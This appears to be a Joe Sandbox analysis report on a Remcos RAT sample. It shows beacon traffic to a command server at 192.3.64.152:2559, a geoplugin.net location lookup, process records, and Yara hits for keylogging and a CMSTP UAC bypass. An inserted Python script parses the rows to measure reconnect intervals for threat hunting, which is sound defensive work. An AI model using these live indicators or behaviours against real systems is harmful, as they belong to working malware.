                                                                                        Nov 5, 2024 11:04:02.330914021 CET255950110192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:02.431725979 CET501112559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:02.437699080 CET255950111192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:02.437838078 CET501112559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:02.441570997 CET501112559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:02.447094917 CET255950111192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:02.946326017 CET255950111192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:02.946702003 CET501112559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:02.946871042 CET501112559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:02.952420950 CET255950111192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:03.040966988 CET501122559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.045965910 CET255950112192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:03.046068907 CET501122559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.049472094 CET501122559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.055428028 CET255950112192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:03.691005945 CET255950112192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:03.691083908 CET501122559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.691112995 CET501122559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.696029902 CET255950112192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:03.791187048 CET501132559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.796284914 CET255950113192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:03.796411991 CET501132559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.799665928 CET501132559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:03.804558992 CET255950113192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.304342031 CET255950113192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.304406881 CET501132559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.304488897 CET501132559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.309422970 CET255950113192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.400752068 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.405648947 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.405787945 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.409317970 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.414141893 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.919457912 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.919720888 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.920296907 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.925096989 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.009744883 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.014624119 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.014727116 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.017909050 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.022737980 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.523601055 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.523669004 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.523705006 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.530567884 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.604079962 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.608994007 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.609096050 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.617156982 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.622124910 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.128257990 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.131162882 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.131205082 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.136657000 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.213007927 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.218411922 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.218491077 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.221762896 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.227258921 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.742518902 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.743191004 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.771642923 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.776602030 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.855052948 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.859945059 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.862667084 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.886750937 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.892551899 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.372462034 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.372534990 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.372626066 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.377433062 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.447408915 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.452313900 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.452398062 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.456132889 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.460963011 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.979331017 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.979396105 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.979614019 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.984447956 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.056632042 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.061592102 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.061676025 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.064804077 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.069608927 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.562489033 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.562560081 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.562618017 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.567524910 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.634955883 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.639844894 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.639931917 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.643347025 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.648178101 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.148169041 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.150227070 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.150316000 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.155046940 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.228394985 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.233474016 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.235234022 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.238405943 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.243444920 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.760375023 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.760468006 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.760560989 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.765367985 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:10.781075001 CET501232559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:10.786147118 CET255950123192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:10.786288023 CET501232559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:10.789320946 CET501232559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:10.794151068 CET255950123192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:11.296396971 CET255950123192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:11.296756983 CET501232559192.168.2.4192.3.64.152
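As exported from Joe Sandbox, every packet row above is the timestamp followed by source port, destination port, source IP and destination IP run together with no separators, so a field such as 501052559192.168.2.4192.3.64.152 admits more than one split (50105/2559 and 5010/62559 both parse). The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: it enumerates every valid reading of a row, settles ambiguous rows by preferring the flow that other rows (normally the reverse direction of the same connection, which splits unambiguously) also produce, optionally nudged towards a known host such as the sandbox IP 192.168.2.4 taken from the HTTP session table, and then measures the gap between successive connections to each server. The embedded rows are copied from this report (the DNS lookup and the first five connections to 192.3.64.152:2559); the function names and the voting heuristic are the example's own.

```python
"""Added example (not from the Joe Sandbox report): parse the report's flattened
packet rows and measure how often the sample reconnects to its C2 endpoint."""
import re
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

# A row is "<timestamp> CET" followed by "<sport><dport><sip><dip>" with no separators.
ROW_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{9}) CET(\d[\d.]*)$")

def _octet(s):
    return s.isdigit() and len(s) <= 3 and (s == "0" or s[0] != "0") and int(s) <= 255

def _port(s):
    return s.isdigit() and len(s) <= 5 and s[0] != "0" and int(s) <= 65535

def _ip_pair(s):
    """Every way to read s as two dotted quads written back to back."""
    parts = s.split(".")
    if len(parts) != 7:          # 8 octets, but the 4th and 5th are fused into one part
        return []
    mid, out = parts[3], []
    for k in range(1, len(mid)):
        a, b = parts[:3] + [mid[:k]], [mid[k:]] + parts[4:]
        if all(map(_octet, a + b)):
            out.append((".".join(a), ".".join(b)))
    return out

def candidates(fused):
    """Every (sport, dport, sip, dip) reading of one fused field."""
    out = []
    for i in range(1, 6):
        for j in range(1, 6):
            p1, p2, rest = fused[:i], fused[i:i + j], fused[i + j:]
            if _port(p1) and _port(p2) and rest[:1].isdigit():
                out += [(int(p1), int(p2), sip, dip) for sip, dip in _ip_pair(rest)]
    return out

def _flow(rec):
    """Unordered endpoint pair, so both directions of a connection share one key."""
    sp, dp, sip, dip = rec[-4:]
    return frozenset([(sip, sp), (dip, dp)])

def parse_rows(rows, known_hosts=frozenset()):
    """Resolve each row to one reading: prefer flows that other rows also produce
    (the reverse direction usually splits only one way), then readings that touch
    a known host such as the sandbox IP. Returns (ts, sport, dport, sip, dip)."""
    parsed = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        cands = candidates(m.group(2)) if m else []
        if cands:
            ts = datetime.strptime(m.group(1)[:-3], "%b %d, %Y %H:%M:%S.%f")  # ns -> us
            parsed.append((ts, cands))
    votes = Counter(_flow(c) for _, cands in parsed for c in cands)
    def score(c):
        return votes[_flow(c)] + (1000 if c[2] in known_hosts or c[3] in known_hosts else 0)
    return [(ts,) + max(cands, key=score) for ts, cands in parsed]

def beacon_intervals(records):
    """Seconds between successive connection starts, per server endpoint. The
    initiator is whoever sent a connection's earliest packet (the SYN on a full capture)."""
    first = {}
    for rec in sorted(records, key=lambda r: r[0]):
        first.setdefault(_flow(rec), (rec[0], (rec[4], rec[2])))   # (start, server endpoint)
    starts = defaultdict(list)
    for ts, server in first.values():
        starts[server].append(ts)
    return {srv: [round((b - a).total_seconds(), 3) for a, b in zip(t, t[1:])]
            for srv, t in ((s, sorted(v)) for s, v in starts.items())}

def summarize(intervals):
    """Median reconnect interval for every endpoint contacted more than once."""
    return {srv: round(median(d), 3) for srv, d in intervals.items() if d}

# Rows copied from this report's packet tables: the DNS lookup and the first two
# packets of five consecutive C2 connections. The host hint is the sandbox IP
# shown in the report's HTTP session table.
SAMPLE_ROWS = [
    "Nov 5, 2024 11:00:07.226109982 CET5710953192.168.2.41.1.1.1",
    "Nov 5, 2024 11:00:07.233444929 CET53571091.1.1.1192.168.2.4",
    "Nov 5, 2024 11:03:57.962826967 CET501062559192.168.2.4192.3.64.152",
    "Nov 5, 2024 11:03:57.967777014 CET255950106192.3.64.152192.168.2.4",
    "Nov 5, 2024 11:03:58.587853909 CET501072559192.168.2.4192.3.64.152",
    "Nov 5, 2024 11:03:58.882587910 CET255950107192.3.64.152192.168.2.4",
    "Nov 5, 2024 11:03:59.529402971 CET501082559192.168.2.4192.3.64.152",
    "Nov 5, 2024 11:03:59.534784079 CET255950108192.3.64.152192.168.2.4",
    "Nov 5, 2024 11:04:00.151151896 CET501092559192.168.2.4192.3.64.152",
    "Nov 5, 2024 11:04:00.156169891 CET255950109192.3.64.152192.168.2.4",
    "Nov 5, 2024 11:04:00.775665998 CET501102559192.168.2.4192.3.64.152",
    "Nov 5, 2024 11:04:00.782075882 CET255950110192.3.64.152192.168.2.4",
]
SANDBOX_IP = "192.168.2.4"

if __name__ == "__main__":
    iv = beacon_intervals(parse_rows(SAMPLE_ROWS, {SANDBOX_IP}))
    for srv, med in summarize(iv).items():
        print(f"{srv[0]}:{srv[1]} reconnects every ~{med}s over {len(iv[srv]) + 1} connections")
```

On these rows the result is a median of 0.625 s between connections to 192.3.64.152:2559, each one a short exchange on a fresh ephemeral port; that steady sub-second reconnect rhythm to a single non-standard port, rather than any payload signature, is what to search for in NetFlow or firewall logs when hunting for this channel.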
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 11:00:07.226109982 CET | 57109 | 53 | 192.168.2.4 | 1.1.1.1
Nov 5, 2024 11:00:07.233444929 CET | 53 | 57109 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 11:00:07.226109982 CET | 192.168.2.4 | 1.1.1.1 | 0xacca | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 11:00:07.233444929 CET | 1.1.1.1 | 192.168.2.4 | 0xacca | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 178.237.33.50 | 80 | 5932 | C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 11:00:07.245033979 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Nov 5, 2024 11:00:08.653970003 CET | 1165 | IN | HTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:00:07 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                                                        Nov 5, 2024 11:00:08.654010057 CET1165INHTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:00:07 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                                                        Nov 5, 2024 11:00:08.654171944 CET1165INHTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:00:07 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49891
Destination IP: 178.237.33.50
Destination Port: 80
PID: 5932
Process: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe

Timestamp    Bytes transferred    Direction    Data
Nov 5, 2024 11:01:22.423628092 CET    71    OUT    GET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
Nov 5, 2024 11:01:23.270556927 CET    1165    IN    HTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:01:23 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                                                                                        Target ID:0
                                                                                        Start time:05:00:02
                                                                                        Start date:05/11/2024
                                                                                        Path:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                                                                                        Imagebase:0x370000
                                                                                        File size:1'042'944 bytes
                                                                                        MD5 hash:5F9342DF635D0A624F0284FA5BBD8B54
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:05:00:04
                                                                                        Start date:05/11/2024
                                                                                        Path:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                                                                                        Imagebase:0x280000
                                                                                        File size:1'042'944 bytes
                                                                                        MD5 hash:5F9342DF635D0A624F0284FA5BBD8B54
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:05:00:05
                                                                                        Start date:05/11/2024
                                                                                        Path:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                                                                                        Imagebase:0xb70000
                                                                                        File size:1'042'944 bytes
                                                                                        MD5 hash:5F9342DF635D0A624F0284FA5BBD8B54
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
